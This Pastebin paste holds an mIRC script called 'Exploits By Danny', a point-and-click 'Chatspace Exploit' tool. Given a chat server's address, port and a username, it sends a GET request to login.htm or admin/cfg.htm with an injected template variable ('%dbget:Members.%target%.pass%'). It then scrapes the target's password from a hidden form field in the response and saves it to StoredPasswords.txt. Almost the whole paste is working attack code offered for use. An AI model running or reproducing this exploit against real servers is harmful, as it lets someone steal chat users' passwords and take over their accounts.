Advertisement
Guest User

Untitled

a guest
Sep 8th, 2017
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.83 KB | None | 0 0
  1. alias csexploit1 { dialog -v,-md csexploit1 csexploit1 }
  2.  
  3. dialog csexploit1 {
  4. title "Exploits By Danny"
  5. size -1 -1 187 192
  6. option dbu
  7. text "Type Of Exploit", 2, 53 1 65 8
  8. check "", 3, 29 12 7 7
  9. text "Default Page", 4, 39 12 55 8
  10. check "", 5, 104 12 7 7
  11. text "Admin Page", 6, 114 12 40 7
  12. text "Server's ip/link", 7, 56 110 65 7
  13. text "Port", 8, 135 110 25 7
  14. edit "server.chat.com", 9, 34 120 95 10
  15. edit "8000", 10, 134 120 25 10
  16. text "Username to Exploit", 11, 46 136 51 7
  17. edit "", 12, 34 147 86 10
  18. button "Execute Exploit", 13, 128 147 54 10
  19. button "Saved Passwords", 15, 55 168 60 10
  20. edit "", 14, 19 24 145 79, autohs autovs multi return hsbar vsbar
  21. }
  22. on *:dialog:csexploit1:init:*:{
  23. dll Dll/mdx.dll SetMircVersion $version
  24. dll Dll/mdx.dll MarkDialog $dname
  25. dll $mdx SetDialog $dname BGColor $color(1)
  26. dll $mdx SetColor $dname 1,2,3,4,5,6,7,8,9,10,11,12,13,15 background $color(1)
  27. dll $mdx SetColor $dname 14 background $color(1)
  28. dll $mdx SetColor $dname 1,2,3,4,5,6,7,8,9,10,11,12,13,15 textbg $color(1)
  29. dll $mdx SetColor $dname 14 textbg $color(1)
  30. dll $mdx SetColor $dname 2 text $color(4)
  31. dll $mdx SetColor $dname 4,6 text $color(4)
  32. dll $mdx SetColor $dname 7,8,9,10 text $color(12)
  33. dll $mdx SetColor $dname 11,12 text $color(4)
  34. dll $mdx SetColor $dname 14 text $color(8)
  35. did -c $dname 3 | set %typeofexploit login.htm
  36. }
  37. on *:dialog:csexploit1:sclick:3:{
  38. set %typeofexploit login.htm
  39. did -u $dname 5
  40. }
  41. on *:dialog:csexploit1:sclick:5:{
  42. set %typeofexploit admin/cfg.htm
  43. did -u $dname 3
  44. }
  45. on *:dialog:csexploit1:sclick:13:{
  46. set %expnick $did(12,seltext)
  47. set %expnickcs12 $did(9,seltext)
  48. set %expnickcs123 $did(10,seltext)
  49. exploit
  50. }
  51. on *:dialog:csexploit1:sclick:15:{
  52. set %fileexp StoredPasswords.txt
  53. did -ra $dname 14
  54. if (%fileexp) { .loadbuf 0 -o $dname 14 " $+ %fileexp $+ "
  55. set %fileexpx mIRC notepad :: $nopath(" $+ %fileexp $+ ")
  56. dialog -t $dname %fileexpx
  57. }
  58. }
  59.  
  60. alias exploit {
  61. sockopen exploit %expnickcs12 %expnickcs123
  62. }
  63. on *:sockopen:exploit:{
  64. sockwrite -n $sockname GET / $+ %typeofexploit $+ ?target= $+ %expnick $+ &nick= $+ %expnick $+ &pass=%dbget:Members.%target%.pass%
  65. }
  66. on *:SOCKREAD:exploit: {
  67. sockread %temp
  68. if (<input type="hidden" name="resumeopts" value="target= isin %temp) {
  69. set %expnick1 $gettok(%temp,7,61)
  70. did -a csexploit1 14 $crlf Site: %expnickcs12 $+ : $+ %expnickcs123 $crlf
  71. did -a csexploit1 14 User: %expnick $crlf
  72. if (%expnick1 == ">) { did -a csexploit1 14 Pass: Not Registered }
  73. else { did -a csexploit1 14 Pass: $remove(%expnick1,",>) $crlf
  74. write StoredPasswords.txt Site: %expnickcs12 $+ : $+ %expnickcs123 $crlf UserName: %expnick $crlf PassWord: $remove(%expnick1,",>) $crlf
  75. }
  76. }
  77. }
  78. menu channel,menubar {
  79. -
  80. [-[-Chatspace Exploit-]-]:/csexploit1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement